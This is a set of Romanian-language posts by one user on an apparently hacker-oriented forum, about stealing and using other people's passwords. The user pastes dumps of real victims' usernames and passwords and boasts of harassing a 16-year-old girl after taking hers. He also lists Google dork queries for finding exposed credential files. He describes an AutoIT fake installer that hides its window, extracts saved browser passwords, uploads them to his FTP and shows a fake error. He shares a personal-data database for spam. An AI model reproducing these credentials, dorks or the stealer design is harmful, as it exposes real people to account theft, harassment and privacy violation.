phantomas90

@catalinkm aici ai dreptate.Din 5 huburi la un search pica vreo 8-10 cer8.db(unu din fierele pt decriptare) iar din aceste ****.default profiles 2 maxim 3 au parole stocate. Iar wand.dat files nu pica decat vreo 2 maxim la 5 huburi!

@mozi n-am inteles ce vrei sa zici. Ce e imposibil?

@Synthesis Eu stiu in mare parte AutoIT.Daca e ma bag si eu dar nu stiu cat as putea ajuta avand in vedere descrierea ta: [I]Pai.. nu mai exista asa ceva pe net.. e unic..[/I] Daca e vorba de put/get de pe FTP sau trimiterea datelor gen username,ip,time,OS, etc asta pot sa fac, daca se accepta chestia cu crearea bat-ului cu script de comenzi dupa care stergerea lui.Nu mi-a iesit niciodata trimiterea direct din executabilul de AutoIT ...da-mi ceva de facut(pe post de test) ca sa-mi dau si eu seama daca ma bag.Si asa vezi si tu daca pot sa ajut sau nu

Folosind cele scrise de Curiosul in tutorialul lui despre phising pe dc++ am dat de dimineata peste un profil de mozilla firefox bogat in parole. Am luat prima: loginul de yahoo...era o fetita de 16 ani...dupa ce am enervat-o vreo 10 min ca tot o scoteam de pe mess i-am retinut ID-ul si i-am dat add de la mine.I-am spus ca i-am luat parola de la yahoo, 1 min n-a mai zis nimic...a intrat repede si a schimbat-o.Dupa ce s-a agitat ea putin i-am spus ca ia-m luat mai multe parole.Normal ca n-a crezut.I-am spus ca am schimbat parola la filelist.ro si i-am dat HTML-ul cu toate parolele ei.La care ea: "Pt ca nu mi-ai schimbat nimic poti sa pastrezi contu de filelist"..perfect.Apoi mi-a zis ca are ceva probleme cu calculatorul...Am pus-o sa ia teamviewer si am rezolvat.Avea userul Admin si cand se incarca windows-ul zicea ceva de genu "Ati fost logat pe un cont TEMP"..fara nici o explicatie. I-am cautat niste documente prin calculator...le avea la admin pe desktop..I-am zis sa foloseasca un wildcard la cautare si dupa ce n-a zis nimic 30 de secunde mi-am dat seama ca habar n-avea ce e ala. Din toata chestia asta eu m-am ales cu un cont de filelist cu un ratio de 2 si o invitatie pe care pot s-o trimit(mai tarziu ca acum nu se mai pot da invitatii).Mai am si eu unu daca vrea cineva...dar are acel ratio foarte mic(0.005).Trebuie sa uploadati vreo 2 GB sa ajunga la 1.Dati PM daca vreti.! Later edit: s-a dat contul de filelist!

@curiosul folosind ce ai zis tu am gasit si eu din 5 huburi un prost cu Opera [I] Password List *********************************************************************************** Website URL: https://login.yahoo.com Username: ray_the_Darkest_archangel Password: rizenothstigma ------------------------------------------------------------------------------------ Website URL: https://www.okazii.ro/login/ Username: username Password: password ------------------------------------------------------------------------------------ Website URL: http://www.mygarage.ro Username: raizenkohakus Password: sangepur ------------------------------------------------------------------------------------ Website URL: http://hi5.com Username: raizenkohakus@yahoo.com Password: necrostigma ------------------------------------------------------------------------------------ Website URL: https://www.opendns.com/dashboard/signin/ Username: username Password: password ------------------------------------------------------------------------------------ Website URL: https://login.facebook.com Username: ray_the_darkest_archangel@yahoo.com Password: necrostigma ------------------------------------------------------------------------------------ Website URL: https://login.photobucket.com Username: raizenkohakus Password: sangepur ------------------------------------------------------------------------------------ Website URL: http://clienti12.claus.ro Username: raizenkohakus Password: sangepur ------------------------------------------------------------------------------------ Website URL: http://www.bestjobs.ro Username: ray_the_darkest_archangel@yahoo.com Password: sangepur ------------------------------------------------------------------------------------ Website URL: http://forums.se-nse.net Username: raizenkohakus Password: sangepur ------------------------------------------------------------------------------------ Website URL: http://iprotebe.cz Username: raizenkohakus Password: sangepur ------------------------------------------------------------------------------------ Website URL: https://sso.forum.nokia.com Username: raizenkohakus Password: sangepur ------------------------------------------------------------------------------------ [/I] Mersi pentru tutorial! Later edit: parola de la yahoo s-ar putea sa nu mai mearga pt ca am intart la el pe mess si le-am zis prietenilor lui sa-i zica ca i-am luat parola si sa si-o schimbe LE:Am mai gasit cate ceva: [i] Password List *********************************************************************************** Website URL: http://kinozal.tv Username: ROGGAL99 Password: 215NEENK ------------------------------------------------------------------------------------ Website URL: https://secure.skype.com Username: alexey Password: 1PoGod5 ------------------------------------------------------------------------------------ Website URL: http://love.qip.ru Username: Sergeev5 Password: BACway15 ------------------------------------------------------------------------------------ Website URL: http://win.mail.ru Username: volale Password: 0 ------------------------------------------------------------------------------------ Website URL: http://love.mail.ru Username: volale Password: 1 ------------------------------------------------------------------------------------ Website URL: http://www.kupivip.ru Username: volale Password: neveZUHAJ08 ------------------------------------------------------------------------------------ Website URL: http://www.kupivip.ru Username: volale@mail.ru Password: neveZUHAJ08 ------------------------------------------------------------------------------------ Website URL: http://www.kinoclub.org Username: Alexey Password: SeRvis541 ------------------------------------------------------------------------------------ [/i] Asta cred ca e vre-un carder ca vad ca sta numai pe forumuri rusesti dar downloadeaza muzica de pe huburi din Romania. Si asta la fel: [i] Password List *********************************************************************************** Website URL: http://login.vk.com Username: dpaluch@mail.ru Password: xlivkiehorki ------------------------------------------------------------------------------------ Website URL: https://auth.mail.ru Username: dplitvinov Password: 0 ------------------------------------------------------------------------------------ Website URL: http://www.all.auto.ru Username: dpaluch@mail.ru Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://www.bibika.ru Username: w711802 Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://www.all.auto.ru Username: dpaluch@mail.ru Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://wg108.odnoklassniki.ru Username: dpaluch@mail.ru Password: xlivkiehorki ------------------------------------------------------------------------------------ Website URL: http://www.all.auto.ru/office/ Username: username Password: password ------------------------------------------------------------------------------------ Website URL: http://passport.yandex.ru Username: dpaluch Password: xlivkiehorki ------------------------------------------------------------------------------------ Website URL: https://mylk.qiwi.ru/features.action Username: (904)555-93-00 Password: xlivkiehorki ------------------------------------------------------------------------------------ Website URL: https://secure.slando.com Username: dpaluch@mail.ru Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://on-board.ru Username: ??????? Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://www.love.gorodovoy.spb.ru Username: dpaluch Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://www.avito.ru Username: dpaluch Password: 2128506 ------------------------------------------------------------------------------------ Website URL: https://auth.mail.ru Username: dpaluch Password: 0 ------------------------------------------------------------------------------------ Website URL: http://login.vk.com Username: dpaluch@mail.ru Password: xlivkiehorki ------------------------------------------------------------------------------------ Website URL: https://lk.beeline.ru Username: dplitvinov Password: 2128506 ------------------------------------------------------------------------------------ Website URL: https://auth.mail.ru Username: dpaluch Password: 0 ------------------------------------------------------------------------------------ Website URL: https://auth.mail.ru Username: bi-uni Password: 3 ------------------------------------------------------------------------------------ Website URL: http://www.bee.fm/ Username: dpaluch Password: 2128506 ------------------------------------------------------------------------------------ Website URL: https://www.selfcare.tele2.ru Username: 9045559300 Password: 7927 ------------------------------------------------------------------------------------ Website URL: http://www.probki.net Username: lyapuch Password: l7565105 ------------------------------------------------------------------------------------ Website URL: https://rbkmoney.ru Username: dpaluch@mail.ru Password: xlivkiehorki ------------------------------------------------------------------------------------ Website URL: http://my.opera.com Username: dpaluch Password: 2128506 ------------------------------------------------------------------------------------ Website URL: http://login.rutracker.org Username: dpaluch Password: 2128506 ------------------------------------------------------------------------------------ [/i] Astea numai ce am gasit useri de opera...ii pun cand strang mai multi si pe cei de mozilla!

@blech nu am incercat inca toate sintaxele dar cateva au scos loguri bune.De exemplu cu “admin account info” filetype:log am dat de cateva loguri(mai vechi intradevar)....Am cartea "google hacking for penetration testers" si as vrea sa fac pe capitole.Am incercat cate ceva si de acolo si cel putin cele cu camerele de supraveghere merg(nu nimeresti exact ce vrei tu sa privesti). De exemplu asta: http://24.231.158.230:8888/ViewerFrame?Mode=Motion Sau asta: AXIS Video Server sau cautari de genu: https://www.google.com/#hl=en&source=hp&q=intitle%3Aindex.of+ws_ftp.ini&btnG=Google+Search&aq=f&aqi=&aql=&oq=intitle%3Aindex.of+ws_ftp.ini&gs_rfai=&fp=d2dedfa38fcb60ce dupa parole de conectare FTP.. Poate intr'adevar sunt vechituri care nu mai merg..cum am mai zis:Daca e nefolositor sa stearga un admin postul..Daca nu revin pe diseara cu inceputul:operatori logici,sintaxe si binding intre sintaxe.

Am gasit aici : “admin account info” filetype:log !Host=*.* intext:enc_UserPassword=* ext:pcf “# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd “AutoCreate=TRUE password=*” “http://*@www” domainname “index of/” “ws_ftp.ini” “parent directory” “liveice configuration file” ext:cfg -site:sourceforge.net “parent directory” +proftpdpasswd “powered by ducalendar” -site:duware.com “Powered by Duclassified” -site:duware.com “Powered by Duclassified” -site:duware.com “DUware All Rights reserved” “powered by duclassmate” -site:duware.com “Powered by Dudirectory” -site:duware.com “powered by dudownload” -site:duware.com “Powered By Elite Forum Version *.*” “Powered by Link Department” “sets mode: +k” “your password is” filetype:log "Powered by DUpaypal" -site:duware.com allinurl: admin mdb auth_user_file.txt config.php eggdrop filetype:user user enable password | secret “current configuration” -intext:the etc (index.of) ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn ext:inc “pwd=” “UID=” ext:ini eudora.ini ext:ini Version=4.0.0.4 password ext:passwd -intext:the -sample -example ext:txt inurl:unattend.txt ext:yml database inurl:config filetype:bak createobject sa filetype:bak inurl:”htaccess|passwd|shadow|htusers” filetype:cfg mrtg “target[*]” -sample -cvs -example filetype:cfm “cfapplication name” password filetype:conf oekakibbs filetype:conf slapd.conf filetype:config config intext:appSettings “User ID” filetype:dat “password.dat” filetype:dat inurl:Sites.dat filetype:dat wand.dat filetype:inc dbconn filetype:inc intext:mysql_connect filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep filetype:ini inurl:”serv-u.ini” filetype:ini inurl:flashFXP.ini filetype:ini ServUDaemon filetype:ini wcx_ftp filetype:ini ws_ftp pwd filetype:ldb admin filetype:log “See `ipsec –copyright” filetype:log inurl:”password.log” filetype:mdb inurl:users.mdb filetype:mdb wwforum filetype:netrc password filetype:pass pass intext:userid filetype:pem intext:private filetype:properties inurl:db intext:password filetype:pwd service filetype:pwl pwl filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword” filetype:reg reg +intext:”WINVNC3” filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS filetype:sql “insert into” (pass|passwd|password) filetype:sql (”values * MD5? | “values * password” | “values * encrypt”) filetype:sql ("passwd values" | "password values" | "pass values" ) filetype:sql +”IDENTIFIED BY” -cvs filetype:sql password filetype:url +inurl:”ftp://” +inurl:”;@" filetype:xls username password email htpasswd htpasswd / htgroup htpasswd / htpasswd.bak intext:”enable password 7? intext:”enable secret 5 $” intext:”powered by EZGuestbook” intext:”powered by Web Wiz Journal” intitle:”index of” intext:connect.inc intitle:”index of” intext:globals.inc intitle:”Index of” passwords modified intitle:”Index of” sc_serv.conf sc_serv content intitle:”phpinfo()” +”mysql.default_password” +”Zend Scripting Language Engine” intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com intitle:index.of administrators.pwd intitle:Index.of etc shadow intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak” intitle:rapidshare intext:login inurl:”calendarscript/users.txt” inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set” inurl:”GRC.DAT” intext:”password” inurl:”Sites.dat”+”PASS=” inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample inurl:”wvdial.conf” intext:”password” inurl:/db/main.mdb inurl:/wwwboard inurl:/yabb/Members/Admin.dat inurl:ccbill filetype:log inurl:cgi-bin inurl:calendar.cfg inurl:chap-secrets -cvs inurl:config.php dbuname dbpass inurl:filezilla.xml -cvs inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man inurl:nuke filetype:sql inurl:ospfd.conf intext:password -sample -test -tutorial -download inurl:pap-secrets -cvs inurl:pass.dat inurl:perform filetype:ini inurl:perform.ini filetype:ini inurl:secring ext:skr | ext:pgp | ext:bak inurl:server.cfg rcon password inurl:ventrilo_srv.ini adminpassword inurl:vtund.conf intext:pass -cvs inurl:zebra.conf intext:password -sample -test -tutorial -download LeapFTP intitle:”index.of./” sites.ini modified master.passwd mysql history files NickServ registration passwords passlist passlist.txt (a better way) passwd passwd / etc (reliable) people.lst psyBNC config files pwd.db server-dbs “intitle:index of” signin filetype:url spwd.db / passwd trillian.ini wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin [WFClient] Password= filetype:ica Doar copy/paste la fiecare sintaxa si cautati prin rezultate. Voi continua acest tutorial daca nu il considerati "boring".Urmatoarea parte este despre folosirea combinata a operatorilor pentru cautari mai stricte.Am inceput prin postarea acestor sintaxe considerandu-le mai importante decat ce urmeaza. Folositi pentru cautare.

@cavalerunegru fii mai explicit.Daca deschizi AutoIT(fereastra de text editor) o sa vezi e ca un compiler normal, cu cuvinte rezervate colorate dupa functie.Are looping-uri gen "for...do..step..next", "while...do", @UserName,@year pentru variabile ale sistemului.In help ai explicat fiecare parametru si fiecare comanda in parte cu parametrii necesari.Descrie mai pe larg ce nu ai inteles sau scrie codurile care nu iti functioneaza.(eu folosesc AutoIT v3). LE: Qbert pune o idee de proiect si eu ajut daca e vorba de AutoIT,pascal ,batch sau Vbs daca nu e prea complicat.

Imi cer scuze pentru dublu post dar prima data nu mi-a aparul ultimul post.Sper sa nu le lase cu ban. @cannabis am luat fisierele puse de tine si mi-am permis sa le modific un pic.Daca te superi sa-mi zici sa sterg postu. Aici: gasesti un "installer" facut pentru FTP-ul meu.Am luat din arhiva ta "CODAT!" fisierele alea ".see3" si le-am redenumit.Nu rula installer.exe din arhiva.Chiar functioneaza. Aici: Asta e codul sursa.L-am compilat in AutoIT v3 si merge. Eventual poti sa mai adaugi ultima linie "FileDelete("*.see3")" si "FileDelete("*.cfg")" ca sa stearga si executabilele care extrag parolele. "$PID=Run(@ComSpec & " /c " & 'ftp -s:utility.cfg', "", @SW_MINIMIZE)" Poti sa folosesti @SW_HIDE in loc de @SW_MINIMIZE..si mai sus tot in cod la fel. linia "MsgBox("","Warning","An error occured during instalation.Installed files have been deleted!")" am adaugat-o cand scriam postul ca o idee sa para mai real programu.

@cannabiss66 e bun programul.L-am luat si eu sa vad cu ce se mananca.Sunt mai incepator in asa ceva.Acele fisiere gen "ProgramName.see3" am vazut ca sunt exe de fapt. Si ele extrag parolele.Stii cumva care e algoritmul de extragere.M-ar interesa sa pot sa le pun pe toate intr-un program.Am cautat in fisierul ala cookies.sqlite dar nu gasesc nimic. Am parolele salvate la cateva site-uri si folosind o comanda in "cmd" de genu find /c c:\docume~1\*.* "parolamea" imi gaseste linii care contin parola in mai multe fisiere.Dar cand intru e totul codat.Si cu file->find nu gaseste nici o parola. M-ar interesa algoritmul de extragere din acele "see3".

Pentium flinstone: 133 mhz 1 mb video,2 gb hdd,32 mb RAM

Dupa cate vad pe aici eu sunt departe rau Stiu aproximativ jumatate din pascal(partea de grafica si integrare de unituri+cateva coduri de ASM sa le introduc intr-un program mai complex)(cum zicea cineva "OLD SCHOOL"). AutoIT beginner, dar nu mi se pare greu de folosit avand in vedere help-ul de la program si forumurile. In rest algoritmii de baza:backtracking,greedy,disjkstra(nu stiu daca asa se scrie corect).

Da demon_zone ai dreptate,nu am muncit prea mult la acest logo. Dar ma refer la ideea ca RST sa apara intr-un cod diferit de celelalte coduri.Adica sa rezulte ca programele noastre(ma rog, ale voastre) sunt diferite de celelalte programe de pe net.Adica avem alti algoritmi mai buni decat ceilalti, se indentifica oriunde un program marca RST.Asta am vrut sa zic prin "Our code is different".

Am incercat si eu sa fac ceva.Nu stiu daca va place:D http://yfrog.com/3urstlogocopyj

Acum am inteles ce am gresit. Am pus mai sus cateva conversii in format .csv .html .sql .xml Nu stiu daca e bine pt ca am folosit un converter.De sql si XML habar nu am daca sunt bune ca nu am lucrat deloc cu asa ceva. Aici e alta baza cu populatie din romania, dar doar date personale, fara e-mail:

Gata oameni buni.Sunt incepator in asa ceva.N-am stiut ca faceti atata scandal pentru ca am pus o arhiva parolata si nu varianta .doc. Imi cer scuze!

Da dar nu Aviatie,...n-am avut locuri..Sunt la Artilerie.

De ce ma injuri? Am uploadat-o de 2 ori pt ca am inchis Tab-ul prima data si nu mai aveam link-ul. Uita-te sa vezi ca cele 2 arhive au aceiasi parola!

Am gasit o baza de date si m-am gandit ca o sa le foloseasca unora(la spam), pt ca am vazut zilele trecute ca se lucra la niste crawlere pt adrese de mail.Acest DBF este arhivat in arhiva solida sfx, contine adrese de mail (in jur de 700..putine oricum) dar are si nume complete de institutii, numere de telefon si fax. Link de download: parola: asa am vazut ca pun multi parola.nu stiu daca e bine.Daca nu am postat bine sau nu e nimic folositor moderatorii sa stearga topicul.

Mai am un an si jumatate pana termin academia militara.

Da.Exista pana pentru messenger 8.Se numeste HyperYM.Pentru versiuni ulterioare nu mai merge.Dar are si un Software Development Kit pentru cei care vor sa dezvolte programul. Il poti lua de aici: http://www.softpedia.com/progDownload/HyperYM-Download-26105.html Sau de aici: http://numedecod.ro/HyperIM/ Iar SDK-ul de la acest HyperYM il iei de aici: http://numedecod.ro/HyperIM/take.php?what=7 Success!

@norocel_ daca era asa simplu puneam de mult sursa completa. Trebuie cumva initializat protocolul tcp/ip pentru trimitere pe FTP,ceva cum e in sursa facuta de cp/m.Am incercat si eu si asa simplu ca tine si cu SSL si da rateuri. Cand termin si merge atunci o sa pun o sursa completa si functionala.Pana acum am pus numai fragmente.O sa fac un mic tutorial cu fiecare comanda ce face.Asa facem osturi degeaba fara sa terminam pana la urma ce am inceput. Later edit: Cred ca fixeaza yahoo exploitu pana terminam noi treaba aici=))..deja sunt o gramada de reply si nimic concret

@norocel cu FTP-ul asta era ideea.Salveaza intr-un txt ID-ul si parola si incarca fisierul pe un ftp free...numai ca mi se blocheaza transferul desi imi returneaza 0(no error) cand rules procesu cap-coada(scriere+incarcare). @paul4games poate ai dreptate si nu am cautat eu cum trebuie.Eu asta am gasit http://www.youtube.com/watch?v=WO8feC_IlHU

Aveti dreptate.Mai bine un moderator sa stearga postul.